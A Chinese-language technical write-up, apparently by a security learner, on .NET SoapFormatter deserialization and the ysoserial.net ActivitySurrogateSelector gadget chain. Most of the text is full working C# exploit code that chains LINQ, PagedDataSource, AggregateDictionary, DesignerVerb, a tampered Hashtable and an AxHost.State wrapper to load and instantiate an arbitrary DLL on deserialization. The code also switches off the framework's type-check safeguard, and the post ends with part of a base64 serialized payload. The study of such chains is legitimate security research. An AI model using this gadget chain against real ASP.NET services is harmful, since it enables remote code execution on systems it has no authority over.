0-0 参考 https://github.com/Y4er/dotnet-deserialization/blob/main/SoapFormatter.md
0-1 ASP.NET 任意类加载 作为和Java高度相似的一门语言,涉及到类,那就肯定涉及到类加载的问题,而DOTNET里的类加载其实也是一样的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 using System;using System.Collections.Generic;using System.IO;using System.Linq;using System.Reflection;namespace DonNET_Deserialization ;public class TEST { public static void Main (string [] args ) { var assembly = Assembly.Load(File.ReadAllBytes("ExpClassa.dll" )); var types = assembly.GetTypes(); Activator.CreateInstance(types[0 ]); } }
csharp里类编译后会变成dll文件,那么我们同样的也可以读取dll文件的字节流,通过Assembly.Load方法去加载,获取到的是一个assembly对象,通过gettypes获取dll内所有的类型,这里当然只有一个类型,然后通过Activator.CreateInstance
实例化对象触发恶意方法 至此我们可以知道,Csharp里的链子形式其实都是类似的。
这东西其实不是今天的重点,因为他只是个序列化的模式,这一节讲的其实是其他几个链子。这里简单介绍一下他的模式。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 using System;using System.IO;using System.Runtime.Serialization.Formatters.Soap;using System.Text;namespace SoapDeserialization { [Serializable ] class Person { private int age; private string name; public int Age { get => age; set => age = value ; } public string Name { get => name; set => name = value ; } public void SayHello () { Console.WriteLine("hello from SayHello" ); } } class Program { static void Main (string [] args ) { SoapFormatter soapFormatter = new SoapFormatter(); Person person = new Person(); person.Age = 10 ; person.Name = "jack" ; using (MemoryStream stream = new MemoryStream()) { soapFormatter.Serialize(stream,person); string soap = Encoding.UTF8.GetString(stream.ToArray()); Console.WriteLine(soap); stream.Position = 0 ; Person p = (Person)soapFormatter.Deserialize(stream); Console.WriteLine(p.Name); p.SayHello(); } Console.ReadKey(); } } }
它和BinaryFormatter其实一样,可以选择代理器,所以思路也几乎一样。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <SOAP-ENV:Envelope xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd ="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC ="http://schemas.xmlsoap.org/soap/encoding/" xm lns:SOAP-ENV ="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr ="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle ="http://schemas.xmlsoap.org/soap/enc oding/" ><SOAP-ENV:Body > <a1:Person id ="ref-1" xmlns:a1 ="http://schemas.microsoft.com/clr/nsassem/SoapDeserialization/DonNET%20Deserialization%2C%20Version%3D1.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyT oken%3Dnull" ><age > 10</age > <name id ="ref-3" > jack</name > </a1:Person > </SOAP-ENV:Body > </SOAP-ENV:Envelope > jack hello from SayHello
输出结果如上,输出的格式又和XmlSerializer一样。
0-3 ActivitySurrogateSelector 攻击链 这一部分其实和Hessian反序列化很相似。在第一篇文章中,带大家了解了代理器的用法,代理器可以让一个不可序列化的类进行序列化,就和下面的Demo一样,但是你会意识到一个问题,就是他无法反序列化。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 using System;using System.IO;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Soap;namespace SoapDeserialization { class Person { public string Name { get ; set ; } public Person (string name ) { Name = name; } public override string ToString () { return Name; } } sealed class PersonSerializeSurrogate : ISerializationSurrogate { public void GetObjectData (Object obj, SerializationInfo info, StreamingContext context ) { var p = (Person)obj; info.AddValue("Name" , p.Name); } public Object SetObjectData (Object obj, SerializationInfo info, StreamingContext context, ISurrogateSelector selector ) { var p = (Person)obj; p.Name = info.GetString("Name" ); return p; } } class Program { public static void Main (string [] args ) { System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck" , "true" ); SoapFormatter fmt = new SoapFormatter(); MemoryStream stm = new MemoryStream(); var ss = new SurrogateSelector(); ss.AddSurrogate(typeof (Person), new StreamingContext(StreamingContextStates.All), new PersonSerializeSurrogate()); fmt.SurrogateSelector = ss; fmt.Serialize(stm, new Person("jack" )); stm.Position = 0 ; Console.WriteLine(fmt.Deserialize(stm)); stm.Position = 0 ; var fmt2 = new SoapFormatter(); Console.WriteLine(fmt2.Deserialize(stm)); Console.ReadKey(); } } }
但是今天说到的ActivitySurrogateSelector就不一样了,他可以序列化,也可以反序列化。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 using System;using System.IO;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Soap;namespace SoapDeserialization { class NonSerializable { private string _text; public NonSerializable (string text ) { _text = text; } public override string ToString () { return _text; } } class MySurrogateSelector : SurrogateSelector { public override ISerializationSurrogate GetSurrogate (Type type, StreamingContext context, out ISurrogateSelector selector ) { selector = this ; if (!type.IsSerializable) { Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" ); return (ISerializationSurrogate)Activator.CreateInstance(t); } return base .GetSurrogate(type, context, out selector); } } class Program { public static void Main (string [] args ) { System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck" , "true" ); SoapFormatter fmt = new SoapFormatter(); MemoryStream stm = new MemoryStream(); fmt.SurrogateSelector = new MySurrogateSelector(); fmt.Serialize(stm, new NonSerializable("Hello World!" )); stm.Position = 0 ; var fmt2 = new SoapFormatter(); Console.WriteLine(fmt2.Deserialize(stm)); Console.ReadKey(); } } }
成功的反序列化了,这是为什么呢?我们可以去分析一下,可以看到payload中有System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate
这一段,其中ObjectSurrogate是关键。 这是它的一个内部类
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 private sealed class ObjectSurrogate : ISerializationSurrogate { public void GetObjectData (object obj, SerializationInfo info, StreamingContext context ) { if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck) { switch (obj) { case ActivityBind _: case DependencyObject _: break ; default : throw new ArgumentException(nameof (obj)); } } info.AddValue("type" , (object ) obj.GetType()); string [] names = (string []) null ; MemberInfo[] serializableMembers = FormatterServicesNoSerializableCheck.GetSerializableMembers(obj.GetType(), out names); object [] objectData = FormatterServices.GetObjectData(obj, serializableMembers); info.AddValue("memberDatas" , (object ) objectData); info.SetType(typeof (ActivitySurrogateSelector.ObjectSurrogate.ObjectSerializedRef)); } public object SetObjectData ( object obj, SerializationInfo info, StreamingContext context, ISurrogateSelector selector ) { return (object ) null ; }
它做了一段处理info.SetType(typeof (ActivitySurrogateSelector.ObjectSurrogate.ObjectSerializedRef));
它将我们序列化的类的属性设置为了ObjectSerializedRef,我们再看看这个类。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 [Serializable ] private sealed class ObjectSerializedRef : IObjectReference , IDeserializationCallback { private Type type; private object [] memberDatas; [NonSerialized ] private object returnedObject; object IObjectReference.GetRealObject(StreamingContext context) { if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck && !typeof (ActivityBind).IsAssignableFrom(this .type) && !typeof (DependencyObject).IsAssignableFrom(this .type)) throw new ArgumentException(nameof (context)); if (this .returnedObject == null ) this .returnedObject = FormatterServices.GetUninitializedObject(this .type); return this .returnedObject; } void IDeserializationCallback.OnDeserialization(object sender) { if (this .returnedObject == null ) return ; if (!AppSettings.DisableActivitySurrogateSelectorTypeCheck && !typeof (ActivityBind).IsAssignableFrom(this .type) && !typeof (DependencyObject).IsAssignableFrom(this .type) && !(this .returnedObject is ActivityBind) && !(this .returnedObject is DependencyObject)) throw new ArgumentException("context" ); string [] names = (string []) null ; FormatterServices.PopulateObjectMembers(this .returnedObject, FormatterServicesNoSerializableCheck.GetSerializableMembers(this .type, out names), this .memberDatas); this .returnedObject = (object ) null ; } } } }
它是一个可序列化的类,也就是说我们可以序列化并且反序列化一个本不可反序列化的类。所以说为啥和Hessian很像,那么既然如此,攻击面就可以扩大化了。
0-3.1 LINQ 什么是LINQ呢,LINQ是C#中一种类sql的查询语法。就简单的举个例子
1 2 3 4 5 6 7 8 9 10 11 12 13 14 public static void Main (string [] args ){ var word = "hello from linq." ; var words = word.Split(' ' ); var q1 = from s in words where s.ToLower().Contains('o' ) select s; Console.WriteLine(q1); foreach (var item in q1) { Console.WriteLine(item); } Console.ReadKey(); }
1 2 3 System.Linq.Enumerable+WhereArrayIterator`1[System.String] hello from
他会返回一个Enumerable迭代对象当做查询结果。并且LINQ有一个特性叫做延迟执行,也就是说当语句执行到 var q1 = from s in words where s.ToLower().Contains('o') select s;
这一步的时候,它并不会执行select语句,它需要被当做enumerable对象的时候会自动触发,也就是上述demo中的foreach (var item in q1)
结合上面说的攻击面扩大,我们可以反序列化LINQ对象进行命令执行,基本的触发链如下
1 2 3 4 5 6 7 8 9 10 11 12 13 public static void Main (string [] args ) { List<byte []> data = new List<byte []>(); data.Add(File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll" )); var e1 = data.Select(Assembly.Load); Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof (Func<Assembly, IEnumerable<Type>>), typeof (Assembly).GetMethod("GetTypes" )); var e2 = e1.SelectMany(map_type); var e3 = e2.Select(Activator.CreateInstance); foreach (var o in e3) { Console.WriteLine(o); } }
他其实和Chaintransformer是一样的,一个链式调用,最终执行到CreateInstance里面实例化任意类,至于那个委托是因为方法需要反射获取。
0-3.2 调用链 ysoserial.net找到的调用链如下
1 2 3 IEnumerable -> PagedDataSource -> ICollection ICollection -> AggregateDictionary -> IDictionary IDictionary -> DesignerVerb -> ToString
最终是要到IEnumberable触发。我们一点点往上看 PagedDataSource 其中属性dataSource是IEnumerable类型,因此可以承接上终点的LINQ,又因为PagedDataSource是ICollection的子类,因此可以往上强转,最终到了AggregateDictionary
这里触发了Enumberable,并且可以看到它的构造方法传入了Icollection对象,我们把上面说到的PagedDataSource放进去就好了。AggregateDictionary
继承IDictionary,因此继续往上看。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 public class DesignerVerb : MenuCommand { public DesignerVerb (string text, EventHandler handler ) : base (handler, StandardCommands.VerbFirst ) { this .Properties[(object ) nameof (Text)] = text == null ? (object ) (string ) null : (object ) Regex.Replace(text, "\\(\\&.\\)" , "" ); } public DesignerVerb (string text, EventHandler handler, CommandID startCommandID ) : base (handler, startCommandID ) { this .Properties[(object ) nameof (Text)] = text == null ? (object ) (string ) null : (object ) Regex.Replace(text, "\\(\\&.\\)" , "" ); } public string Description { get => (string ) this .Properties[(object ) nameof (Description)] ?? string .Empty; set => this .Properties[(object ) nameof (Description)] = (object ) value ; } public string Text => (string ) this .Properties[(object ) nameof (Text)] ?? string .Empty; public override string ToString () => this .Text + " : " + base .ToString(); } }
这里把一些重点方法拿出来了。可以看到ToString的地方配合上Text字段的getter方法可以接上AggregateDictionary
,我们只需要将properties设置为AggregateDictionary
即可。因此最终来到了如何触发ToString方法上,这里Ysoserial中使用的是HashTable。 Hashtable在反序列化的时候会重新建key集合。引发异常的话就会触发ToString,如图,如果2个键相同就会引发异常。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 using System;using System.Collections.Generic;using System.Linq;using System.Collections;using System.ComponentModel.Design;using System.Data;using System.IO;using System.Reflection;using System.Web.UI.WebControls;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Binary;using System.Runtime.Serialization.Formatters.Soap;using NDesk.Options;namespace ysoserial.Generators { public class MySurrogateSelector : SurrogateSelector { public override ISerializationSurrogate GetSurrogate (Type type, StreamingContext context, out ISurrogateSelector selector ) { selector = this ; if (!type.IsSerializable) { Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" ); return (ISerializationSurrogate)Activator.CreateInstance(t); } return base .GetSurrogate(type, context, out selector); } } [Serializable ] public class PayloadClass : ISerializable { protected byte [] assemblyBytes; protected int variant_number = 1 ; public PayloadClass () { this .assemblyBytes = File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll" ); } private IEnumerable <TResult > CreateWhereSelectEnumerableIterator <TSource , TResult >(IEnumerable<TSource> src, Func<TSource, bool > predicate, Func<TSource, TResult> selector ) { Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" ) .GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2" ) .MakeGenericType(typeof (TSource), typeof (TResult)); return t.GetConstructors()[0 ].Invoke(new object [] { src, predicate, selector }) as IEnumerable<TResult>; } protected PayloadClass (SerializationInfo info, StreamingContext context ) { } public List<object > GadgetChains () { DesignerVerb verb = null ; Hashtable ht = null ; List<object > ls = null ; List<byte []> data = new List<byte []>(); data.Add(this .assemblyBytes); var e1 = data.Select(Assembly.Load); Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof (Func<Assembly, IEnumerable<Type>>), typeof (Assembly).GetMethod("GetTypes" )); var e2 = e1.SelectMany(map_type); var e3 = e2.Select(Activator.CreateInstance); PagedDataSource pds = new PagedDataSource() { DataSource = e3 }; IDictionary dict = (IDictionary)Activator.CreateInstance(typeof (int ).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary" ), pds); verb = new DesignerVerb("" , null ); typeof (MenuCommand).GetField("properties" , BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict); ls = new List<object >(); ls.Add(e1); ls.Add(e2); ls.Add(e3); ls.Add(pds); ls.Add(verb); ls.Add(dict); ht = new Hashtable(); ht.Add(verb, "" ); ht.Add("" , "" ); FieldInfo fi_keys = ht.GetType().GetField("buckets" , BindingFlags.NonPublic | BindingFlags.Instance); Array keys = (Array)fi_keys.GetValue(ht); FieldInfo fi_key = keys.GetType().GetElementType().GetField("key" , BindingFlags.Public | BindingFlags.Instance); for (int i = 0 ; i < keys.Length; ++i) { object bucket = keys.GetValue(i); object key = fi_key.GetValue(bucket); if (key is string ) { fi_key.SetValue(bucket, verb); keys.SetValue(bucket, i); break ; } } fi_keys.SetValue(ht, keys); ls.Add(ht); return ls; } public byte [] GadgetChainsToBinaryFormatter () { List<object > ls = GadgetChains(); MemoryStream stm = new MemoryStream(); System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter(); fmt.SurrogateSelector = new MySurrogateSelector(); fmt.Serialize(stm, ls); return stm.ToArray(); } public void GetObjectData (SerializationInfo info, StreamingContext context ) { System.Diagnostics.Trace.WriteLine("In GetObjectData" ); info.SetType(typeof (System.Windows.Forms.AxHost.State)); info.AddValue("PropertyBagBinary" , GadgetChainsToBinaryFormatter()); } } public class Exp { public static void Main (string [] args ) { System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck" , "true" ); PayloadClass payload = new PayloadClass(); using (MemoryStream memoryStream = new MemoryStream(payload.GadgetChainsToBinaryFormatter())) { memoryStream.Position = 0 ; var bn=new BinaryFormatter(); bn.Deserialize(memoryStream); } } } }
虽然也可以弹窗,但是这个payload会报错,在实战中可能会导致利用失败,为了避免这种情况,ysoserial选择了一种二次反序列化的做法。
0-3.3 AxHost.State 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 protected State (SerializationInfo info, StreamingContext context ) { SerializationInfoEnumerator enumerator = info.GetEnumerator(); if (enumerator == null ) return ; while (enumerator.MoveNext()) { if (string .Compare(enumerator.Name, "Data" , true , CultureInfo.InvariantCulture) == 0 ) { try { byte [] buffer = (byte []) enumerator.Value; if (buffer != null ) this .InitializeFromStream((Stream) new MemoryStream(buffer)); } catch (Exception ex) { } } else if (string .Compare(enumerator.Name, "PropertyBagBinary" , true , CultureInfo.InvariantCulture) == 0 ) { try { byte [] buffer = (byte []) enumerator.Value; if (buffer != null ) { this .propBag = new AxHost.PropertyBagStream(); this .propBag.Read((Stream) new MemoryStream(buffer)); } } catch (Exception ex) { } } } }
在反序列化的时候他会对PropertyBagBinary进行binary反序列化。 最主要的是这里还做了异常处理,就避免了异常发生。
0-3.4 最终Payload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 using System;using System.Collections.Generic;using System.Linq;using System.Collections;using System.ComponentModel.Design;using System.Data;using System.IO;using System.Reflection;using System.Web.UI.WebControls;using System.Runtime.Serialization;using System.Runtime.Serialization.Formatters.Binary;using System.Runtime.Serialization.Formatters.Soap;using NDesk.Options;namespace ysoserial.Generators { public class MySurrogateSelector : SurrogateSelector { public override ISerializationSurrogate GetSurrogate (Type type, StreamingContext context, out ISurrogateSelector selector ) { selector = this ; if (!type.IsSerializable) { Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" ); return (ISerializationSurrogate)Activator.CreateInstance(t); } return base .GetSurrogate(type, context, out selector); } } [Serializable ] public class PayloadClass : ISerializable { protected byte [] assemblyBytes; protected int variant_number = 1 ; public PayloadClass () { this .assemblyBytes = File.ReadAllBytes("E:\\CTFLearning\\开发学习\\CsharpLearning\\ExpClassa\\ExpClassa\\obj\\Debug\\ExpClassa.dll" ); } private IEnumerable <TResult > CreateWhereSelectEnumerableIterator <TSource , TResult >(IEnumerable<TSource> src, Func<TSource, bool > predicate, Func<TSource, TResult> selector ) { Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" ) .GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2" ) .MakeGenericType(typeof (TSource), typeof (TResult)); return t.GetConstructors()[0 ].Invoke(new object [] { src, predicate, selector }) as IEnumerable<TResult>; } protected PayloadClass (SerializationInfo info, StreamingContext context ) { } public List<object > GadgetChains () { DesignerVerb verb = null ; Hashtable ht = null ; List<object > ls = null ; List<byte []> data = new List<byte []>(); data.Add(this .assemblyBytes); var e1 = data.Select(Assembly.Load); Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof (Func<Assembly, IEnumerable<Type>>), typeof (Assembly).GetMethod("GetTypes" )); var e2 = e1.SelectMany(map_type); var e3 = e2.Select(Activator.CreateInstance); PagedDataSource pds = new PagedDataSource() { DataSource = e3 }; IDictionary dict = (IDictionary)Activator.CreateInstance(typeof (int ).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary" ), pds); verb = new DesignerVerb("" , null ); typeof (MenuCommand).GetField("properties" , BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict); ls = new List<object >(); ls.Add(e1); ls.Add(e2); ls.Add(e3); ls.Add(pds); ls.Add(verb); ls.Add(dict); ht = new Hashtable(); ht.Add(verb, "" ); ht.Add("" , "" ); FieldInfo fi_keys = ht.GetType().GetField("buckets" , BindingFlags.NonPublic | BindingFlags.Instance); Array keys = (Array)fi_keys.GetValue(ht); FieldInfo fi_key = keys.GetType().GetElementType().GetField("key" , BindingFlags.Public | BindingFlags.Instance); for (int i = 0 ; i < keys.Length; ++i) { object bucket = keys.GetValue(i); object key = fi_key.GetValue(bucket); if (key is string ) { fi_key.SetValue(bucket, verb); keys.SetValue(bucket, i); break ; } } fi_keys.SetValue(ht, keys); ls.Add(ht); return ls; } public byte [] GadgetChainsToBinaryFormatter () { List<object > ls = GadgetChains(); MemoryStream stm = new MemoryStream(); System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter(); fmt.SurrogateSelector = new MySurrogateSelector(); fmt.Serialize(stm, ls); return stm.ToArray(); } public void GetObjectData (SerializationInfo info, StreamingContext context ) { System.Diagnostics.Trace.WriteLine("In GetObjectData" ); info.SetType(typeof (System.Windows.Forms.AxHost.State)); info.AddValue("PropertyBagBinary" , GadgetChainsToBinaryFormatter()); } } public class Exp { public static void Main (string [] args ) { System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck" , "true" ); PayloadClass payload = new PayloadClass(); using (MemoryStream memoryStream = new MemoryStream()) { SoapFormatter sp1 = new SoapFormatter(); sp1.Serialize(memoryStream, payload); memoryStream.Position = 0 ; var sp2=new SoapFormatter(); sp2.Deserialize(memoryStream); } } } }
最终payload如上,经过了一层State包装就保证了不会报错。至此这条利用链就完成了
0-4 ActivitySurrogateSelectorFromFile 只是取这个名字而已,就是动态控制dll文件的内容,不难实现,ysoserial帮我们做好了。
0-5 小结 到这里可以发现其实和标题的Soap是没啥关系的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 <SOAP-ENV:Envelope xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd ="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC ="http://schemas.xmlsoap.org/soap/encoding/" xm lns:SOAP-ENV ="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr ="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle ="http://schemas.xmlsoap.org/soap/enc oding/" ><SOAP-ENV:Body > <a1:AxHost_x002B_State id ="ref-1" xmlns:a1 ="http://schemas.microsoft.com/clr/nsassem/System.Windows.Forms/System.Windows.Forms%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20P ublicKeyToken%3Db77a5c561934e089" ><PropertyBagBinary href ="#ref-3" /> </a1:AxHost_x002B_State > <SOAP-ENC:Array id ="ref-3" xsi:type ="SOAP-ENC:base64" > AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAABwAAAAcAAAAQAgAAAAgAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAA CQgAAAAJCQAAAAoMCgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQMAAABqU3lzdGVtLldvcmtmbG9 3LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbG l6YXRpb25Ib2xkZXIKAAAACQsAAAAJDAAAAAEEAAAAAwAAAAkNAAAACQ4AAAABBQAAAAMAAAAJDwAAAAkQAAAAAQYAAAADAAAACREAAAAJEgAAAAEHAAAAAwAAAAkTAAAACRQAAAABCAAAAAMAAAAJFQAAAAkWAAAABAkAAAAcU3lzdGVtL kNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0 ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJFwAAAAkYAAAABAsAAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYZAAA A+AFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0TGlzdEl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNT YxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGGgAAAE5TeXN0ZW0uQ 29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQDAAAAAcAAAAJGwAAAAoJHAAAAAkdAAAACAgAAAAACggIAQAAAAENAAAACwAAAAYeAAAA+AFTeXN0ZW0uTGlu cS5FbnVtZXJhYmxlKzxTZWxlY3RNYW55SXRlcmF0b3I+ZF9fMTdgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTV jNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJGgAAABAOAAAACQAAAAgI/v///woICAEAAA AKCQMAAAAKCSEAAAANAgEPAAAACwAAAAYiAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlP W5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODld XQQAAAAJGgAAABAQAAAABwAAAAkEAAAACgklAAAACggIAAAAAAoICAEAAAABEQAAAAsAAAAGJgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGJwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4 wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRASAAAABwAAAAkFAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARMAAAALAAAABikAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2 lnbi5EZXNpZ25lclZlcmIEAAAABioAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAUAAAABQAAAA0CCSsAAAAICAMAAAAJCAAAAAEVAAAACwAAA 